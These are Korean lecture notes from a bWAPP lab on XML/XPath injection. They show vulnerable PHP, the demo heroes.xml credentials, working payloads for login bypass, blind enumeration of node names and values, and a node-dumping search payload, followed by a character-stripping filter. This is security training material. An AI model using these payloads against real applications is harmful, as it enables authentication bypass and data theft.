

----------------------------------------------------------------------------------------------------------------------------------------------------------------
30강.XML/XPath Injection(Login Form)

XML
HTML을 개선하여 만든 언어이다.
홈페이지 구축기능, 검색기능 등이 향상되었고, 웹 페이지의 추가와 작성이 편리해졌다.
XML을 이용하면 사용자가 구조화된 데이터베이스를 조작할 수 있다.
데이터를 트리 구조의 노드로 표현하며, 사용자 정의로 데이터를 분류할 수 있다.
heroes.xml 파일 : http://192.168.20.205/bWAPP/passwords/

ex)------------------------------------------------------------
<heroes>
<hero>
<id>1</id>
<login>neo</login>
<password>trinity</password>
<secret>Oh why didn't I took that BLACK pill?</secret>
<movie>The Matrix</movie>
<genre>action sci-fi</genre>
</hero>
<hero>
<id>2</id>
<login>alice</login>
<password>loveZombies</password>
<secret>There's a cure!</secret>
<movie>Resident Evil</movie>
<genre>action horror sci-fi</genre>
</hero>
----------------------------------------------------------------

  
  
Xpath
XML에게 질의할때 사용하는 일종의 쿼리이다.
XML DB의 내용을 선택하거나 조작할 수 있다. 
  
XML 문법을 어느정도 알아야하지만 일단은 넘어간다
Xpath 조회 연습 사이트 : https://www.w3schools.com/xml/xpath_examples.asp  
  
  
  vi xmli_1.php
ex)---------------------------------------------------------------------------------------------------------------------------------------------
  if(isset($_REQUEST["login"]) & isset($_REQUEST["password"]))
{
    $login = $_REQUEST["login"];
    $login = xmli($login);
    $password = $_REQUEST["password"];
    $password = xmli($password);

    // Loads the XML file
    $xml = simplexml_load_file("passwords/heroes.xml");

    // XPath search
    $result = $xml->xpath("/heroes/hero[login='" . $login . "' and password='" . $password . "']");
  
  
  ---------------------------------------------------------------------------------------------------------------------------------------------

  
  
Injection - XML/XPath Injection(Login Form)
이 시나리오는 XML 구조에 악의적인 행위를 발생시키는 내용을 인젝션하는 공격하는 내용이다.
실습 진행시 로그인/패스워드 폼을 사용하는데, 로그인 폼에 인젝션을 실시하여 공격을 실시할 수 있다.
참/거짓때 출력되는 메세지를 확인하여 XML 인젝션 공격을 진행한다.

  ' or 1=1 or ' 을 실시하여 참인 경우, 출력 메세지 확인(Neo 계정이 데이터베이스 첫번째 있기 때문에 출력됨)
  ' or 1=2 or ' 을 실시하여 거짓인 경우, 출력 메세지 확인(거짓인 경우 'Invalid credentials!' 가 출력됨)
  
  
$result = $xml->xpath("/heroes/hero[login='" . $login . "' and password='" . $password . "']");

>> $result = $xml->xpath("/heroes/hero[login='' or 1=1 or '' and password='']");

 요런 원리
 
  
  
현재 상위 노드인 heroes에서 자신과 동일한 위치에 있는 자식 노드(6개)가 몇개 인지를 알아보는 인젝션
neo' and count(../child::*)=1 or '1'='2
neo' and count(../child::*)=2 or '1'='2
neo' and count(../child::*)=3 or '1'='2
neo' and count(../child::*)=4 or '1'='2
neo' and count(../child::*)=5 or '1'='2
neo' and count(../child::*)=6 or '1'='2

참이 나올때까지 크롤링
  

  
부모의 이름(6글자)의 길이가 몇글자인지를 알아보는 인젝션
neo' and string-length(name(parent::*))=1 or '1'='2
neo' and string-length(name(parent::*))=2 or '1'='2
neo' and string-length(name(parent::*))=3 or '1'='2
neo' and string-length(name(parent::*))=4 or '1'='2
neo' and string-length(name(parent::*))=5 or '1'='2
neo' and string-length(name(parent::*))=6 or '1'='2  
  
  
  
부모의 이름(heroes)을 알아보는 인젝션
neo' and substring(name(parent::*),1,1)='h' or '1'='2
neo' and substring(name(parent::*),2,1)='e' or '1'='2
neo' and substring(name(parent::*),3,1)='r' or '1'='2
neo' and substring(name(parent::*),4,1)='o' or '1'='2
neo' and substring(name(parent::*),5,1)='e' or '1'='2
neo' and substring(name(parent::*),6,1)='s' or '1'='2
neo' and name(parent::*)='heroes' or '1'='2
  
  
  
  

첫번째 자식 노드의 이름 길이(4글자)와 이름(hero)을 알아보는 인젝션
(이런식으로 여섯번째 자식 노드까지 인젝션 실시)
neo' and string-length(name(../child::*[position()=1]))=1 or '1'='2
neo' and string-length(name(../child::*[position()=1]))=2 or '1'='2
neo' and string-length(name(../child::*[position()=1]))=3 or '1'='2
neo' and string-length(name(../child::*[position()=1]))=4 or '1'='2


neo' and substring(name(../child::*[position()=1]), 1, 1)='h' or '1'='2
neo' and substring(name(../child::*[position()=1]), 2, 1)='e' or '1'='2
neo' and substring(name(../child::*[position()=1]), 3, 1)='r' or '1'='2
neo' and substring(name(../child::*[position()=1]), 4, 1)='o' or '1'='2
neo' and name(../child::*[position()=1])='hero' or '1'='2
  
  
  
 첫번째 hero 노드의 첫번째 자식 노드 이름 길이(2글자)와 이름(id)를 알아보는 인젝션
neo' and string-length(name(/heroes/hero[1]/child::*[position()=1]))=1 or '1'='2
neo' and string-length(name(/heroes/hero[1]/child::*[position()=1]))=2 or '1'='2

neo' and substring(name(/heroes/hero[1]/child::*[position()=1]),1,1)='i' or '1'='2
neo' and substring(name(/heroes/hero[1]/child::*[position()=1]),2,1)='d' or '1'='2
neo' and name(/heroes/hero[1]/child::*[position()=1])='id' or '1'='2
  
  
    
 
 첫번째 hero 노드의 두번째 자식 노드 이름 길이(5글자)와 이름(login)를 알아보는 인젝션
neo' and string-length(name(/heroes/hero[1]/child::*[position()=2]))=1 or '1'='2
neo' and string-length(name(/heroes/hero[1]/child::*[position()=2]))=2 or '1'='2
neo' and string-length(name(/heroes/hero[1]/child::*[position()=2]))=3 or '1'='2
neo' and string-length(name(/heroes/hero[1]/child::*[position()=2]))=4 or '1'='2
neo' and string-length(name(/heroes/hero[1]/child::*[position()=2]))=5 or '1'='2

neo' and substring(name(/heroes/hero[1]/child::*[position()=2]),1,1)='l' or '1'='2
neo' and substring(name(/heroes/hero[1]/child::*[position()=2]),2,1)='o' or '1'='2
neo' and substring(name(/heroes/hero[1]/child::*[position()=2]),3,1)='g' or '1'='2
neo' and substring(name(/heroes/hero[1]/child::*[position()=2]),4,1)='i' or '1'='2
neo' and substring(name(/heroes/hero[1]/child::*[position()=2]),5,1)='n' or '1'='2
neo' and name(/heroes/hero[1]/child::*[position()=2])='login' or '1'='2
  
  
 
 첫번째 hero 노드의 두번째 자식 노드 login의 값 길이(3글자)와 내용(neo)을 알아보는 인젝션
neo' and string-length(string(//hero[1]/login))=1 or '1'='2
neo' and string-length(string(//hero[1]/login))=2 or '1'='2
neo' and string-length(string(//hero[1]/login))=3 or '1'='2

neo' and substring(//hero[1]/login,1,1)='n' or '1'='2
neo' and substring(//hero[1]/login,2,1)='e' or '1'='2
neo' and substring(//hero[1]/login,3,1)='o' or '1'='2
neo' and string(//hero[1]/login)='neo' or '1'='2
  
  
  
  sql 인젝션과 원리가 비슷하다!
  
  
 보안코드------------------------------------------------------------------------------------------
 function xmli_check_1($data)
{

    // str_replace()을 이용하여 특수문자(기호)들을 이스케프를 실시한다.
    // str_replace(A, B, C) : C 문자열에서 A 문자열을 B 문자열로 치환 시킴
    // Replaces dangerous characters: ( ) = ' [ ] : , * / WHITESPACE
  
    $input = str_replace("(", "", $data);   
    $input = str_replace(")", "", $input);
    $input = str_replace("=", "", $input);
    $input = str_replace("'", "", $input);
    $input = str_replace("[", "", $input);
    $input = str_replace("]", "", $input);
    $input = str_replace(":", "", $input);
    $input = str_replace(",", "", $input);
    $input = str_replace("*", "", $input);
    $input = str_replace("/", "", $input);
    $input = str_replace(" ", "", $input);

 
    return $input;
}
-----------------------------------------------------------------------------------------------------
  
  여기에 파라미터 고정
  
   
  
---------------------------------------------------------------------------------------------------------------------------------------------------------------






----------------------------------------------------------------------------------------------------------------------------------------------------------------
31강.Injection - XML/XPath Injection(Search)
  
백엔드가 XML 로 이루어져 있을 때 하는 인젝션 
XML을 인젝션 하는 것
  
  
heroes.xml-----------------------------------------------------------------------------------------------
<?xml version="1.0" encoding="UTF-8"?>
<heroes>
        <hero>
                <id>1</id>
                <login>neo</login>
                <password>trinity</password>
                <secret>Oh why didn't I took that BLACK pill?</secret>
                <movie>The Matrix</movie>
                <genre>action sci-fi</genre>
        </hero>


 ~ 중간 생략 ~

 

        <hero>
                <id>6</id>
                <login>selene</login>
                <password>m00n</password>
                <secret>It wasn't the Lycans. It was you.</secret>
                <movie>Underworld</movie>
                <genre>action horror sci-fi</genre>
        </hero>
</heroes>
-----------------------------------------------------------------------------------------------  
  
xmli-------------------------------------------------------------------------------------------------  
 

if(isset($_REQUEST["genre"]))
{

 

    $genre = $_REQUEST["genre"];
    $genre = xmli($genre);

 

    // Loads the XML file
    $xml = simplexml_load_file("passwords/heroes.xml");

 

    // XPath search
    // $result = $xml->xpath("//hero[genre = '$genre']/movie");
    $result = $xml->xpath("//hero[contains(genre, '$genre')]/movie");

-------------------------------------------------------------------------------------------------  
  
  
  
 
  contains() 함수 : 두개의 인자에서 첫번째 인자의 문자열이 두번째 인자의 문자열이 있으면 참, 없으면 거짓으로 처리
  contains('CCNA', 'CCNP')   <- 참
  contains('CCNA', 'MS')      <- 거짓
  

  
  
  
  
  
  1.
 '(작은 따옴표)를 인젝션하여 취약점이 있는지 확인 실시
http://192.168.20.205/bWAPP/xmli_2.php?genre='&action=search

------------------------------------------------------------------------------------------------------
sult = $xml->xpath("//hero[contains(genre, '$genre')]/movie");

Ex1) ') or 1=1 ][ ('1
$result = $xml->xpath("//hero[contains(genre, '') or 1=1 ][ ('1')]/movie");
                                                              ①      ②       ③    

① hero[contains(genre, '')  

    ') 을 인젝션하여 contains 함수를 닫아서 정상 쿼리로 인식하여 거짓으로 처리됨

 
② hero[contains(genre, '') or 1=1 ]  

             거짓

    ] 을 인젝션하여 정상 쿼리로 인식하고, or 1=1에 의해서 [ ] 안에 내용이 참으로 처리됨
 

③ [ ('1')]
   [ ('1 을 인젝션하여 1이라는 의미 없는 문자를 입력하여 정상 쿼리로 인식함
-----------------------------------------------------------------------------------------------------
 





2.
') or 1=1 ][ ('1  을 인젝션하여 참인 경우, 출력 내용 확인
http://192.168.20.205/bWAPP/xmli_2.php?genre=') or 1=1 ][ ('1&action=search







3.
') or 1=1] | //* | cisco[('1 을 인젝션하여 출력 내용 확인
http://192.168.20.205/bWAPP/xmli_2.php?genre=') or 1=1] | //* | cisco[('1&action=search


---------------------------------------------------------------------------------------------------
Ex2) ') or 1=1] | //* | cisco[('
$result = $xml->xpath("//hero[contains(genre, '') or 1=1] | //* | cisco[('1')]/movie");
                                                                    ①     ②      ③    

① hero[contains(genre, '') or 1=1]  
 ') 을 인젝션하여 contains 함수를 닫아서 거짓으로 처리되며, or 1=1]에 의해서 참으로 처리함

② | //* |  
  파이프는 서로 다른 쿼리들 연결을 수행하며, //*에 의해서 현재 노드로부터 모든 노드를 조회함

③ cisco[('1')]/
  cisco라는 문자열과 함께 [(1' 를 인젝션하여 1이라는 의미 없는 문자를 입력하여 정상 쿼리로 인식함
----------------------------------------------------------------------------------------------------
 
  
  
  
  
  
 보안코드 전 강의와 동일----------------------------------------------------------------------------
function xmli_check_1($data)

{
    // str_replace()을 이용하여 특수문자(기호)들을 이스케프를 실시한다.
    // str_replace(A, B, C) : C 문자열에서 A 문자열을 B 문자열로 치환 시킴
    // Replaces dangerous characters: ( ) = ' [ ] : , * / WHITESPACE

    $input = str_replace("(", "", $data);   
    $input = str_replace(")", "", $input);
    $input = str_replace("=", "", $input);
    $input = str_replace("'", "", $input);
    $input = str_replace("[", "", $input);
    $input = str_replace("]", "", $input);
    $input = str_replace(":", "", $input);
    $input = str_replace(",", "", $input);
    $input = str_replace("*", "", $input);
    $input = str_replace("/", "", $input);
    $input = str_replace(" ", "", $input);
    return $input;

   

}
-----------------------------------------------------------------------------------------------
  
여기에 파라미터 고정  
  
----------------------------------------------------------------------------------------------------------------------------------------------------------------





